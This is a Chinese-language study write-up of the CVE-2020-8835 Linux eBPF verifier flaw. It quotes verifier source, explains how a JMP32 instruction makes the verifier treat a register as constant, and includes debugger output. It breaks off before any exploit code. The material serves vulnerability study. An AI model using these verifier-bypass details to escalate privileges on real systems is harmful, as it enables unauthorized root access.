CVE-2020-8835_eBPF提权漏洞分析

2020年 pwn2own 爆出来的一个提权漏洞，这里主要是学习一下 ebpf 的新检查机制的绕过方法

漏洞分析

漏洞原理

漏洞版本是 linux-5.6版本内核，该漏洞是在 commit 581738a681b6中引入。原因是其在 do_check检测 条件跳转逻辑时，新添加了一个检测函数：

static void __reg_bound_offset32(struct bpf_reg_state *reg)
{
	u64 mask = 0xffffFFFF;
    //传入reg->umin_value和reg->umax_value的低32位
	struct tnum range = tnum_range(reg->umin_value & mask,
				       reg->umax_value & mask);
    //取低32位bit
	struct tnum lo32 = tnum_cast(reg->var_off, 4);
	//取高32bit，低32bit为0
    struct tnum hi32 = tnum_lshift(tnum_rshift(reg->var_off, 32), 32);

	reg->var_off = tnum_or(hi32, tnum_intersect(lo32, range));
}

这里首先了解一下 bpf_reg_state结构体，该结构体是用于虚拟寄存器的数据结构，这里需要关注的变量，已经在下面注释。

struct bpf_reg_state {
	/* Ordering of fields matters.  See states_equal() */
	enum bpf_reg_type type;
	union {
		/* valid when type == PTR_TO_PACKET */
		u16 range;

		/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
		 *   PTR_TO_MAP_VALUE_OR_NULL
		 */
		struct bpf_map *map_ptr;

		u32 btf_id; /* for PTR_TO_BTF_ID */

		/* Max size from any of the above. */
		unsigned long raw;
	};
	/* Fixed part of pointer offset, pointer types only */
	s32 off;

	u32 id;

	u32 ref_obj_id;

	struct tnum var_off;

	s64 smin_value; /* minimum possible (s64)value有符号可能最小值 */
	s64 smax_value; /* maximum possible (s64)value有符号可能最大值 */
	u64 umin_value; /* minimum possible (u64)value无符号可能最小值 */
	u64 umax_value; /* maximum possible (u64)value无符号可能最大值 */
	/* parentage chain for liveness checking */
	struct bpf_reg_state *parent;

	u32 frameno;

	s32 subreg_def;
	enum bpf_reg_liveness live;
	/* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
	bool precise;
};

struct tnum {
    u64 value;
    u64 mask;
}

其中 var_off是 tnum类型，在 tnum中有两个成员：

• value：某个bit为1表示这个寄存器的这个bit确定是1
• mask：某个bit为1表示这个bit是未知的

并且当 mask为0的时候，表示该 tnum是一个数字，值为 value。

在上面 reg_bound_offset32函数中分别调用了4个函数：tnum_range、tnum_cast、tnum_lshift和 tnum_intersect函数。这里重点分析以下 tnum_range和 tnum_intersect函数。

漏洞点就出现在这个 tnum_range 函数，原本 reg->umin_value和 reg->umax_value都是 64位，但是在 reg_bound32_offset32函数中传入的参数却只传入了各自的低32位。

假设 reg->umin_value=1，reg->umax_value=0x1 0000 0001，那么传入该函数时取低32位，就会各自变为 min=1和 max=1，这样当计算完 tnum_range时 ，结果为chi=0，bits=0，delta=0，min=1。返回的 range结果：range.value=1和 range.mask=0。

struct tnum tnum_range(u64 min, u64 max)
{
	u64 chi = min ^ max, delta;
    //从右往左第一个为1的bit是哪一位，从1开始数
	//例如fsl64(0100) == 3
    u8 bits = fls64(chi);
    

	/* special case, needed because 1ULL << 64 is undefined */
	if (bits > 63)
		return tnum_unknown;
	/* e.g. if chi = 4, bits = 3, delta = (1<<3) - 1 = 7.
	 * if chi = 0, bits = 0, delta = (1<<0) - 1 = 0, so we return
	 
	 *  constant min (since min == max).
	 */
	delta = (1ULL << bits) - 1;
	return TNUM(min & ~delta, delta);
}

然后执行到 tnum_intersect函数，假设 a.value=0，计算后 v=1, mu=0。最终得到的 var_off就是固定值 1，也即不管寄存器真实的值是什么，在检测过程中都会将其当作是 1。但是，这个寄存器的值在真实执行时，我们却可以通过map去设置，也即可以用来绕过bpf的检查。

/* Note that if a and b disagree - i.e. one has a 'known 1' where the other has
 * a 'known 0' - this will return a 'known 1' for that bit.
 */
struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
	u64 v, mu;

	v = a.value | b.value;
	mu = a.mask & b.mask;
	return TNUM(v & ~mu, mu);
}

触发流程

上面简述了该漏洞的一种触发情况。但是如何触发该漏洞呢。从源码中可以发现如下调用链：

do_check->check_cond_jmp->reg_set_min_max->__reg_bound_offset32

下面结合源码大致讲解如下BPF指令的 verify过程：

BPF_JMP32_IMM(BPF_JLE, BPF_REG_6, 5, 1)

bpf_check

所有的 BPF指令在真正执行前，都会先进行一个检查，防止指令中有恶意功能。程序首先会进入 bpf_check函数。在这里会为指令建立一个检查的内存空间，然后依次检查指令的长度，检查eBPF指令的控制流图，检测是否有死循环和不可能到达的路径。最后会调用一个重点函数 do_check_main，该函数最后会调用 do_check执行指令检测。

int bpf_check(struct bpf_prog **prog, union bpf_attr *attr,
	      union bpf_attr __user *uattr)
{
	u64 start_time = ktime_get_ns();
	struct bpf_verifier_env *env;
	struct bpf_verifier_log *log;
	int i, len, ret = -EINVAL;
	bool is_priv;

	/* no program is valid */
	if (ARRAY_SIZE(bpf_verifier_ops) == 0)
		return -EINVAL;

	/* 'struct bpf_verifier_env' can be global, but since it's not small,
	 * allocate/free it every time bpf_check() is called
	 */
    //分配bpf_verifier_env空间
	env = kzalloc(sizeof(struct bpf_verifier_env), GFP_KERNEL);
	if (!env)
		return -ENOMEM;
	log = &env->log;
	//指令长度
	len = (*prog)->len;
	env->insn_aux_data =
		vzalloc(array_size(sizeof(struct bpf_insn_aux_data), len));
	ret = -ENOMEM;
	if (!env->insn_aux_data)
		goto err_free_env;
	for (i = 0; i < len; i++)
		env->insn_aux_data[i].orig_idx = i;
	env->prog = *prog;
	env->ops = bpf_verifier_ops[env->prog->type];
	is_priv = capable(CAP_SYS_ADMIN);

	if (!btf_vmlinux && IS_ENABLED(CONFIG_DEBUG_INFO_BTF)) {
		mutex_lock(&bpf_verifier_lock);
		if (!btf_vmlinux)
			btf_vmlinux = btf_parse_vmlinux();
		mutex_unlock(&bpf_verifier_lock);
	}

	/* grab the mutex to protect few globals used by verifier */
	if (!is_priv)
		mutex_lock(&bpf_verifier_lock);

	if (attr->log_level || attr->log_buf || attr->log_size) {
		/* user requested verbose verifier output
		 * and supplied buffer to store the verification trace
		 */
		log->level = attr->log_level;
		log->ubuf = (char __user *) (unsigned long) attr->log_buf;
		log->len_total = attr->log_size;

		ret = -EINVAL;
		/* log attributes have to be sane */
		if (log->len_total < 128 || log->len_total > UINT_MAX >> 2 ||
		    !log->level || !log->ubuf || log->level & ~BPF_LOG_MASK)
			goto err_unlock;
	}

	if (IS_ERR(btf_vmlinux)) {
		/* Either gcc or pahole or kernel are broken. */
		verbose(env, "in-kernel BTF is malformed\n");
		ret = PTR_ERR(btf_vmlinux);
		goto skip_full_check;
	}

	env->strict_alignment = !!(attr->prog_flags & BPF_F_STRICT_ALIGNMENT);
	if (!IS_ENABLED(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS))
		env->strict_alignment = true;
	if (attr->prog_flags & BPF_F_ANY_ALIGNMENT)
		env->strict_alignment = false;

	env->allow_ptr_leaks = is_priv;

	if (is_priv)
		env->test_state_freq = attr->prog_flags & BPF_F_TEST_STATE_FREQ;
	
    //将伪指令中操作map_fd的部分替换成map地址，注意这个地址是8字节的，因此在实现中用本指令的imm和下一条指令的2个4字节中存储了这个地址
	ret = replace_map_fd_with_map_ptr(env);
	if (ret < 0)
		goto skip_full_check;

	if (bpf_prog_is_dev_bound(env->prog->aux)) {
		ret = bpf_prog_offload_verifier_prep(env->prog);
		if (ret)
			goto skip_full_check;
	}

	env->explored_states = kvcalloc(state_htab_size(env),
				       sizeof(struct bpf_verifier_state_list *),
				       GFP_USER);
	ret = -ENOMEM;
	if (!env->explored_states)
		goto skip_full_check;

	ret = check_subprogs(env);
	if (ret < 0)
		goto skip_full_check;

	ret = check_btf_info(env, attr, uattr);
	if (ret < 0)
		goto skip_full_check;

	ret = check_attach_btf_id(env);
	if (ret)
		goto skip_full_check;
	//检查eBPF指令的控制流图，检测是否有死循环和不可能到达的路径
	ret = check_cfg(env);
	if (ret < 0)
		goto skip_full_check;
	//检查eBPF程序中的所有全局函数
	ret = do_check_subprogs(env);
    //调用do_check_common，do_check_common中的核心函数是do_check
	ret = ret ?: do_check_main(env);

	if (ret == 0 && bpf_prog_is_dev_bound(env->prog->aux))
		ret = bpf_prog_offload_finalize(env);

skip_full_check:
		...		//有省略
err_unlock:
	if (!is_priv)
		mutex_unlock(&bpf_verifier_lock);
	vfree(env->insn_aux_data);
err_free_env:
	kfree(env);
	return ret;
}

do_check

在 do_check函数中，会对每条指令进行更深入的检测。主要思想是根据指令的功能，来检测指令的原操作数，目的操作数是否符合相应功能的安全范围。

static int do_check(struct bpf_verifier_env *env)
{
	struct bpf_verifier_state *state = env->cur_state;
	struct bpf_insn *insns = env->prog->insnsi;
	struct bpf_reg_state *regs;
	int insn_cnt = env->prog->len;
	bool do_print_state = false;
	int prev_insn_idx = -1;
	//循环检测每条指令
	for (;;) {
		struct bpf_insn *insn;
		u8 class;
		int err;

		env->prev_insn_idx = prev_insn_idx;
		if (env->insn_idx >= insn_cnt) {
			verbose(env, "invalid insn idx %d insn_cnt %d\n",
				env->insn_idx, insn_cnt);
			return -EFAULT;
		}

		insn = &insns[env->insn_idx];
        //获取指令类型
		class = BPF_CLASS(insn->code);
		//运行过的次数上限检查
		if (++env->insn_processed > BPF_COMPLEXITY_LIMIT_INSNS) {
			verbose(env,
				"BPF program is too large. Processed %d insn\n",
				env->insn_processed);
			return -E2BIG;
		}
		//检测该指令有无visit，主要通过env->explored_states的状态数组保存访问过的指令的状态
		err = is_state_visited(env, env->insn_idx);
		if (err < 0)
			return err;
		if (err == 1) {
			/* found equivalent state, can prune the search */
			if (env->log.level & BPF_LOG_LEVEL) {
				if (do_print_state)
					verbose(env, "\nfrom %d to %d%s: safe\n",
						env->prev_insn_idx, env->insn_idx,
						env->cur_state->speculative ?
						" (speculative execution)" : "");
				else
					verbose(env, "%d: safe\n", env->insn_idx);
			}
			goto process_bpf_exit;
		}

		if (signal_pending(current))
			return -EAGAIN;

		if (need_resched())
			cond_resched();

		if (env->log.level & BPF_LOG_LEVEL2 ||
		    (env->log.level & BPF_LOG_LEVEL && do_print_state)) {
			if (env->log.level & BPF_LOG_LEVEL2)
				verbose(env, "%d:", env->insn_idx);
			else
				verbose(env, "\nfrom %d to %d%s:",
					env->prev_insn_idx, env->insn_idx,
					env->cur_state->speculative ?
					" (speculative execution)" : "");
			print_verifier_state(env, state->frame[state->curframe]);
			do_print_state = false;
		}

		if (env->log.level & BPF_LOG_LEVEL) {
			const struct bpf_insn_cbs cbs = {
				.cb_print	= verbose,
				.private_data	= env,
			};

			verbose_linfo(env, env->insn_idx, "; ");
			verbose(env, "%d: ", env->insn_idx);
			print_bpf_insn(&cbs, insn, env->allow_ptr_leaks);
		}

		if (bpf_prog_is_dev_bound(env->prog->aux)) {
			err = bpf_prog_offload_verify_insn(env, env->insn_idx,
							   env->prev_insn_idx);
			if (err)
				return err;
		}

		regs = cur_regs(env);
		env->insn_aux_data[env->insn_idx].seen = env->pass_cnt;
		prev_insn_idx = env->insn_idx;
		//运算类型
		if (class == BPF_ALU || class == BPF_ALU64) {
            //检查具体指令的合法性，比如是否使用了保留的field，使用的寄存器编号是否超过了模拟寄存器的最大编号，寄存器是否可读/写，寄存器值是否是指针等，该函数后面详细解释
			err = check_alu_op(env, insn);
			if (err)
				return err;
		//取值类型
		} else if (class == BPF_LDX) {
			enum bpf_reg_type *prev_src_type, src_reg_type;

			/* check for reserved fields is already done */

			/* check src operand */
            //检测源寄存器的编号是否超过最大编号，如果为操作数其是否初始化，是否是指针
			err = check_reg_arg(env, insn->src_reg, SRC_OP);
			if (err)
				return err;
			//检查目的寄存器
			err = check_reg_arg(env, insn->dst_reg, DST_OP_NO_MARK);
			if (err)
				return err;
		
			src_reg_type = regs[insn->src_reg].type;

			/* check that memory (src_reg + off) is readable,
			 * the state of dst_reg will be updated by this func
			 */
            //检查源寄存器+off所指的地址是可读的
			err = check_mem_access(env, env->insn_idx, insn->src_reg,
					       insn->off, BPF_SIZE(insn->code),
					       BPF_READ, insn->dst_reg, false);
			if (err)
				return err;

			prev_src_type = &env->insn_aux_data[env->insn_idx].ptr_type;

			if (*prev_src_type == NOT_INIT) {
				/* saw a valid insn
				 * dst_reg = *(u32 *)(src_reg + off)
				 * save type to validate intersecting paths
				 */
				*prev_src_type = src_reg_type;

			} else if (reg_type_mismatch(src_reg_type, *prev_src_type)) {
				/* ABuser program is trying to use the same insn
				 * dst_reg = *(u32*) (src_reg + off)
				 * with different pointer types:
				 * src_reg == ctx in one branch and
				 * src_reg == stack|map in some other branch.
				 * Reject it.
				 */
				verbose(env, "same insn cannot be used with different pointers\n");
				return -EINVAL;
			}
		//赋值指令
		} else if (class == BPF_STX) {
			enum bpf_reg_type *prev_dst_type, dst_reg_type;

			if (BPF_MODE(insn->code) == BPF_XADD) {
				err = check_xadd(env, env->insn_idx, insn);
				if (err)
					return err;
				env->insn_idx++;
				continue;
			}

			/* check src1 operand */
			err = check_reg_arg(env, insn->src_reg, SRC_OP);
			if (err)
				return err;
			/* check src2 operand */
			err = check_reg_arg(env, insn->dst_reg, SRC_OP);
			if (err)
				return err;

			dst_reg_type = regs[insn->dst_reg].type;

			/* check that memory (dst_reg + off) is writeable */
			err = check_mem_access(env, env->insn_idx, insn->dst_reg,
					       insn->off, BPF_SIZE(insn->code),
					       BPF_WRITE, insn->src_reg, false);
			if (err)
				return err;

			prev_dst_type = &env->insn_aux_data[env->insn_idx].ptr_type;

			if (*prev_dst_type == NOT_INIT) {
				*prev_dst_type = dst_reg_type;
			} else if (reg_type_mismatch(dst_reg_type, *prev_dst_type)) {
				verbose(env, "same insn cannot be used with different pointers\n");
				return -EINVAL;
			}
		
		} else if (class == BPF_ST) {
			if (BPF_MODE(insn->code) != BPF_MEM ||
			    insn->src_reg != BPF_REG_0) {
				verbose(env, "BPF_ST uses reserved fields\n");
				return -EINVAL;
			}
			/* check src operand */
			err = check_reg_arg(env, insn->dst_reg, SRC_OP);
			if (err)
				return err;

			if (is_ctx_reg(env, insn->dst_reg)) {
				verbose(env, "BPF_ST stores into R%d %s is not allowed\n",
					insn->dst_reg,
					reg_type_str[reg_state(env, insn->dst_reg)->type]);
				return -EACCES;
			}

			/* check that memory (dst_reg + off) is writeable */
			err = check_mem_access(env, env->insn_idx, insn->dst_reg,
					       insn->off, BPF_SIZE(insn->code),
					       BPF_WRITE, -1, false);
			if (err)
				return err;
		//跳转类型
		} else if (class == BPF_JMP || class == BPF_JMP32) {
			u8 opcode = BPF_OP(insn->code);

			env->jmps_processed++;
            //调用指令
			if (opcode == BPF_CALL) {
				if (BPF_SRC(insn->code) != BPF_K ||
				    insn->off != 0 ||
				    (insn->src_reg != BPF_REG_0 &&
				     insn->src_reg != BPF_PSEUDO_CALL) ||
				    insn->dst_reg != BPF_REG_0 ||
				    class == BPF_JMP32) {
					verbose(env, "BPF_CALL uses reserved fields\n");
					return -EINVAL;
				}

				if (env->cur_state->active_spin_lock &&
				    (insn->src_reg == BPF_PSEUDO_CALL ||
				     insn->imm != BPF_FUNC_spin_unlock)) {
					verbose(env, "function calls are not allowed while holding a lock\n");
					return -EINVAL;
				}
				if (insn->src_reg == BPF_PSEUDO_CALL)
					err = check_func_call(env, insn, &env->insn_idx);
				else
					err = check_helper_call(env, insn->imm, env->insn_idx);
				if (err)
					return err;
			//无符号大于跳转
			} else if (opcode == BPF_JA) {
				if (BPF_SRC(insn->code) != BPF_K ||
				    insn->imm != 0 ||
				    insn->src_reg != BPF_REG_0 ||
				    insn->dst_reg != BPF_REG_0 ||
				    class == BPF_JMP32) {
					verbose(env, "BPF_JA uses reserved fields\n");
					return -EINVAL;
				}

				env->insn_idx += insn->off + 1;
				continue;
			//exit指令
			} else if (opcode == BPF_EXIT) {
				if (BPF_SRC(insn->code) != BPF_K ||
				    insn->imm != 0 ||
				    insn->src_reg != BPF_REG_0 ||
				    insn->dst_reg != BPF_REG_0 ||
				    class == BPF_JMP32) {
					verbose(env, "BPF_EXIT uses reserved fields\n");
					return -EINVAL;
				}

				if (env->cur_state->active_spin_lock) {
					verbose(env, "bpf_spin_unlock is missing\n");
					return -EINVAL;
				}

				if (state->curframe) {
					/* exit from nested function */
					err = prepare_func_exit(env, &env->insn_idx);
					if (err)
						return err;
					do_print_state = true;
					continue;
				}

				err = check_reference_leak(env);
				if (err)
					return err;

				err = check_return_code(env);
				if (err)
					return err;
process_bpf_exit:
				update_branch_counts(env, env->cur_state);
				err = pop_stack(env, &prev_insn_idx,
						&env->insn_idx);
				if (err < 0) {
					if (err != -ENOENT)
						return err;
					break;
				} else {
					do_print_state = true;
					continue;
				}
			} else {
                //条件跳转指令检测
				err = check_cond_jmp_op(env, insn, &env->insn_idx);
				if (err)
					return err;
			}
		} else if (class == BPF_LD) {
			u8 mode = BPF_MODE(insn->code);

			if (mode == BPF_ABS || mode == BPF_IND) {
				err = check_ld_abs(env, insn);
				if (err)
					return err;

			} else if (mode == BPF_IMM) {
				err = check_ld_imm(env, insn);
				if (err)
					return err;

				env->insn_idx++;
				env->insn_aux_data[env->insn_idx].seen = env->pass_cnt;
			} else {
				verbose(env, "invalid BPF_LD mode\n");
				return -EINVAL;
			}
		} else {
			verbose(env, "unknown insn class %d\n", class);
			return -EINVAL;
		}

		env->insn_idx++;
	}

	return 0;
}

check_cond_jmp_op

从上面 do_check中可以看到对于条件跳转，最后会调用 check_cond_jmp_op函数。这个函数主要分为两类，一类是比较条件是 寄存器类型，一类是比较条件是 立即数。其首先会调用 is_branch_taken获取需要执行的分支，然后调用 push_stack将当前不会执行的另一个分支压入栈中。最后会以 两个 bpf_reg_state类型的 false_reg和 true_reg来标识分支的执行情况，并且调用 reg_set_min_max函数用以修改 false_reg和 true_reg的值。

static int check_cond_jmp_op(struct bpf_verifier_env *env,
			     struct bpf_insn *insn, int *insn_idx)
{
	struct bpf_verifier_state *this_branch = env->cur_state;
	struct bpf_verifier_state *other_branch;
	struct bpf_reg_state *regs = this_branch->frame[this_branch->curframe]->regs;
	struct bpf_reg_state *dst_reg, *other_branch_regs, *src_reg = NULL;
	u8 opcode = BPF_OP(insn->code);
	bool is_jmp32;
	int pred = -1;
	int err;

	/* Only conditional jumps are expected to reach here. */
	if (opcode == BPF_JA || opcode > BPF_JSLE) {
		verbose(env, "invalid BPF_JMP/JMP32 opcode %x\n", opcode);
		return -EINVAL;
	}
	//操作数是寄存器类型
	if (BPF_SRC(insn->code) == BPF_X) {
		if (insn->imm != 0) {
			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
			return -EINVAL;
		}

		/* check src1 operand */
		err = check_reg_arg(env, insn->src_reg, SRC_OP);
		if (err)
			return err;

		if (is_pointer_value(env, insn->src_reg)) {
			verbose(env, "R%d pointer comparison prohibited\n",
				insn->src_reg);
			return -EACCES;
		}
		src_reg = &regs[insn->src_reg];
	} else {
        //操作数是立即数
		if (insn->src_reg != BPF_REG_0) {
			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
			return -EINVAL;
		}
	}

	/* check src2 operand */
	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
	if (err)
		return err;
	//获取目的寄存器
	dst_reg = &regs[insn->dst_reg];
	is_jmp32 = BPF_CLASS(insn->code) == BPF_JMP32;
	
    //调用 is_branch_taken获取跳转分支
	if (BPF_SRC(insn->code) == BPF_K)
		pred = is_branch_taken(dst_reg, insn->imm,
				       opcode, is_jmp32);
	else if (src_reg->type == SCALAR_VALUE &&
		 tnum_is_const(src_reg->var_off))
		pred = is_branch_taken(dst_reg, src_reg->var_off.value,
				       opcode, is_jmp32);
	if (pred >= 0) {
		err = mark_chain_precision(env, insn->dst_reg);
		if (BPF_SRC(insn->code) == BPF_X && !err)
			err = mark_chain_precision(env, insn->src_reg);
		if (err)
			return err;
	}
	if (pred == 1) {
		/* only follow the goto, ignore fall-through */
		*insn_idx += insn->off;
		return 0;
	} else if (pred == 0) {
		/* only follow fall-through branch, since
		 * that's where the program will go
		 */
		return 0;
	}
	//压入另一个现不会执行的分支
	other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx,
				  false);
	if (!other_branch)
		return -EFAULT;
	other_branch_regs = other_branch->frame[other_branch->curframe]->regs;

	/* detect if we are comparing against a constant value so we can adjust
	 * our min/max values for our dst register.
	 * this is only legit if both are scalars (or pointers to the same
	 * object, I suppose, but we don't support that right now), because
	 * otherwise the different base pointers mean the offsets aren't
	 * comparable.
	 */
    //每个分支在此处用一个 false_reg和 true_reg来进行记录，类型即为上述所讲bpf_reg_state结构体
    //若源操作数是一个 寄存器类型
	if (BPF_SRC(insn->code) == BPF_X) {
		struct bpf_reg_state *src_reg = &regs[insn->src_reg];
		struct bpf_reg_state lo_reg0 = *dst_reg;
		struct bpf_reg_state lo_reg1 = *src_reg;
		struct bpf_reg_state *src_lo, *dst_lo;

		dst_lo = &lo_reg0;
		src_lo = &lo_reg1;
		coerce_reg_to_size(dst_lo, 4);
		coerce_reg_to_size(src_lo, 4);

		if (dst_reg->type == SCALAR_VALUE &&
		    src_reg->type == SCALAR_VALUE) {
			if (tnum_is_const(src_reg->var_off) ||
			    (is_jmp32 && tnum_is_const(src_lo->var_off)))
                //调用reg_set_min_max函数修改false_reg和true_reg的范围
				reg_set_min_max(&other_branch_regs[insn->dst_reg],
						dst_reg,
						is_jmp32
						? src_lo->var_off.value
						: src_reg->var_off.value,
						opcode, is_jmp32);
			else if (tnum_is_const(dst_reg->var_off) ||
				 (is_jmp32 && tnum_is_const(dst_lo->var_off)))
				reg_set_min_max_inv(&other_branch_regs[insn->src_reg],
						    src_reg,
						    is_jmp32
						    ? dst_lo->var_off.value
						    : dst_reg->var_off.value,
						    opcode, is_jmp32);
			else if (!is_jmp32 &&
				 (opcode == BPF_JEQ || opcode == BPF_JNE))
				/* Comparing for equality, we can combine knowledge */
				reg_combine_min_max(&other_branch_regs[insn->src_reg],
						    &other_branch_regs[insn->dst_reg],
						    src_reg, dst_reg, opcode);
		}
	} 
    //若源操作数是一个立即数，也会调用reg_set_min_max函数修改false_reg和true_reg的范围
    else if (dst_reg->type == SCALAR_VALUE) {
		reg_set_min_max(&other_branch_regs[insn->dst_reg],
					dst_reg, insn->imm, opcode, is_jmp32);
	}

	/* detect if R == 0 where R is returned from bpf_map_lookup_elem().
	 * NOTE: these optimizations below are related with pointer comparison
	 *       which will never be JMP32.
	 */
	if (!is_jmp32 && BPF_SRC(insn->code) == BPF_K &&
	    insn->imm == 0 && (opcode == BPF_JEQ || opcode == BPF_JNE) &&
	    reg_type_may_be_null(dst_reg->type)) {
		/* Mark all identical registers in each branch as either
		 * safe or unknown depending R == 0 or R != 0 conditional.
		 */
		mark_ptr_or_null_regs(this_branch, insn->dst_reg,
				      opcode == BPF_JNE);
		mark_ptr_or_null_regs(other_branch, insn->dst_reg,
				      opcode == BPF_JEQ);
	} else if (!try_match_pkt_pointers(insn, dst_reg, &regs[insn->src_reg],
					   this_branch, other_branch) &&
		   is_pointer_value(env, insn->dst_reg)) {
		verbose(env, "R%d pointer comparison prohibited\n",
			insn->dst_reg);
		return -EACCES;
	}
	if (env->log.level & BPF_LOG_LEVEL)
		print_verifier_state(env, this_branch->frame[this_branch->curframe]);
	return 0;
}

reg_set_min_max

从 check_cond_jmp中可以看到其最后会为false_reg和 true_reg调用 reg_set_min_max函数。在这个函数中，会根据跳转类型，执行对应的功能。最后其 会调用我们上面所讲的漏洞函数 __reg_bound_offset32。

/* Adjusts the register min/max values in the case that the dst_reg is the
 * variable register that we are working on, and src_reg is a constant or we're
 * simply doing a BPF_K check.
 * In JEQ/JNE cases we also adjust the var_off values.
 */
static void reg_set_min_max(struct bpf_reg_state *true_reg,
			    struct bpf_reg_state *false_reg, u64 val,
			    u8 opcode, bool is_jmp32)
{
	s64 sval;

	/* If the dst_reg is a pointer, we can't learn anything about its
	 * variable offset from the compare (unless src_reg were a pointer into
	 * the same object, but we don't bother with that.
	 * Since false_reg and true_reg have the same type by construction, we
	 * only need to check one of them for pointerness.
	 */
	if (__is_pointer_value(false, false_reg))
		return;

	val = is_jmp32 ? (u32)val : val;
	sval = is_jmp32 ? (s64)(s32)val : (s64)val;

	switch (opcode) {
	case BPF_JEQ:
	case BPF_JNE:
	{
		struct bpf_reg_state *reg =
			opcode == BPF_JEQ ? true_reg : false_reg;

		/* For BPF_JEQ, if this is false we know nothing Jon Snow, but
		 * if it is true we know the value for sure. Likewise for
		 * BPF_JNE.
		 */
		if (is_jmp32) {
			u64 old_v = reg->var_off.value;
			u64 hi_mask = ~0xffffffffULL;

			reg->var_off.value = (old_v & hi_mask) | val;
			reg->var_off.mask &= hi_mask;
		} else {
			__mark_reg_known(reg, val);
		}
		break;
	}
	case BPF_JSET:
		false_reg->var_off = tnum_and(false_reg->var_off,
					      tnum_const(~val));
		if (is_power_of_2(val))
			true_reg->var_off = tnum_or(true_reg->var_off,
						    tnum_const(val));
		break;
	case BPF_JGE:
	case BPF_JGT:
	{
		u64 false_umax = opcode == BPF_JGT ? val    : val - 1;
		u64 true_umin = opcode == BPF_JGT ? val + 1 : val;

		if (is_jmp32) {
			false_umax += gen_hi_max(false_reg->var_off);
			true_umin += gen_hi_min(true_reg->var_off);
		}
		false_reg->umax_value = min(false_reg->umax_value, false_umax);
		true_reg->umin_value = max(true_reg->umin_value, true_umin);
		break;
	}
	case BPF_JSGE:
	case BPF_JSGT:
	{
		s64 false_smax = opcode == BPF_JSGT ? sval    : sval - 1;
		s64 true_smin = opcode == BPF_JSGT ? sval + 1 : sval;

		/* If the full s64 was not sign-extended from s32 then don't
		 * deduct further info.
		 */
		if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
			break;
		false_reg->smax_value = min(false_reg->smax_value, false_smax);
		true_reg->smin_value = max(true_reg->smin_value, true_smin);
		break;
	}
	case BPF_JLE:
	case BPF_JLT:
	{
		u64 false_umin = opcode == BPF_JLT ? val    : val + 1;
		u64 true_umax = opcode == BPF_JLT ? val - 1 : val;

		if (is_jmp32) {
			false_umin += gen_hi_min(false_reg->var_off);
			true_umax += gen_hi_max(true_reg->var_off);
		}
		false_reg->umin_value = max(false_reg->umin_value, false_umin);
		true_reg->umax_value = min(true_reg->umax_value, true_umax);
		break;
	}
	case BPF_JSLE:
	case BPF_JSLT:
	{
		s64 false_smin = opcode == BPF_JSLT ? sval    : sval + 1;
		s64 true_smax = opcode == BPF_JSLT ? sval - 1 : sval;

		if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
			break;
		false_reg->smin_value = max(false_reg->smin_value, false_smin);
		true_reg->smax_value = min(true_reg->smax_value, true_smax);
		break;
	}
	default:
		break;
	}

	__reg_deduce_bounds(false_reg);
	__reg_deduce_bounds(true_reg);
	/* We might have learned some bits from the bounds. */
	__reg_bound_offset(false_reg);
	__reg_bound_offset(true_reg);
	if (is_jmp32) {
		__reg_bound_offset32(false_reg);
		__reg_bound_offset32(true_reg);
	}
	/* Intersecting with the old var_off might have improved our bounds
	 * slightly.  e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
	 * then new var_off is (0; 0x7f...fc) which improves our umax.
	 */
	__update_reg_bounds(false_reg);
	__update_reg_bounds(true_reg);
}

也就说 该指令 BPF_JMP32_IMM(BPF_JLE, BPF_REG_6, 5, 1)，由于原操作数是立即数 5，且是32位 JMP32。所以最后能够进入 __reg_bound_offset32()函数。

调试分析

然后需要考虑如何在执行这条指令前，使 BPF_REG_6的 umin_value=1和umax_value=0x100000001。
首先从上面 reg_set_min_max函数的功能中就可以看到其可以对输入的 true_reg和 false_reg的 min_value和max_value进行赋值。也即我们利用这个函数，只要参数设置得当就可以将一个 true_reg和false_reg的 uim_value 或 umax_value设置为指定值。
这里直接看源代码，有一些不太清楚。所以下面直接通过调试来理清以下流程。
首先跟踪 BPF_JMP32_IMM(BPF_JLE, BPF_REG_6, 5, 1)执行到如下代码。

reg_set_min_max(&other_branch_regs[insn->dst_reg],
			dst_reg, insn->imm, opcode, is_jmp32);

这里查看结果如下：

In file: /home/a1ex/Desktop/vul/cve-2020-8335/linux-5.6/kernel/bpf/verifier.c              
   6201                                 reg_combine_min_max(&other_branch_regs[insn->src_reg],               
   6202                                                     &other_branch_regs[insn->dst_reg],               
   6203                                                     src_reg, dst_reg, opcode);     
   6204                 }                                                                  
   6205         } else if (dst_reg->type == SCALAR_VALUE) {                                
 ► 6206                 reg_set_min_max(&other_branch_regs[insn->dst_reg],                 
   6207                                         dst_reg, insn->imm, opcode, is_jmp32);     
   6208         }                                                                          
   6209                                                                                    
    
pwndbg> p/x insn->dst_reg    //目标寄存器为6
$102 = 0x6                   
pwndbg> p/x insn->src_reg    //源寄存器为6
$103 = 0x0                   
pwndbg> p/x insn->imm		//立即数为5
$106 = 0x5
pwndbg> p/x insn->off		//偏移为1
$107 = 0x1
//所以可以判定此时刚好执行的就是该指令

//查看参数，可以发现true_reg参数就是 r6寄存器的结构体
pwndbg> p/x (struct bpf_reg_state)other_branch_regs[6]
$105 = {
  type = 0x1,
  {
    range = 0x0,
    map_ptr = 0x0,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x0,
    mask = 0x1ffffffff
  },
  smin_value = 0x1,
  smax_value = 0x100000001,
  umin_value = 0x1,
  umax_value = 0x100000001,
  parent = 0xffff88800e960a70,
  frameno = 0x0,
  subreg_def = 0x0,
  live = 0x0,
  precise = 0x1
}c

所以这里可以断定，我们需要修改 reg_set_min_max函数的 true_reg参数。那么需要在 check_cond_jmp_op函数中找到能够修改 true_reg结构体 umin_value和 umax_value的功能。

这里可以找到如下两段代码：

//BPF_JGE和BPF_JGT可以修改true_reg的umin_value
	case BPF_JGE:
	case BPF_JGT:
	{
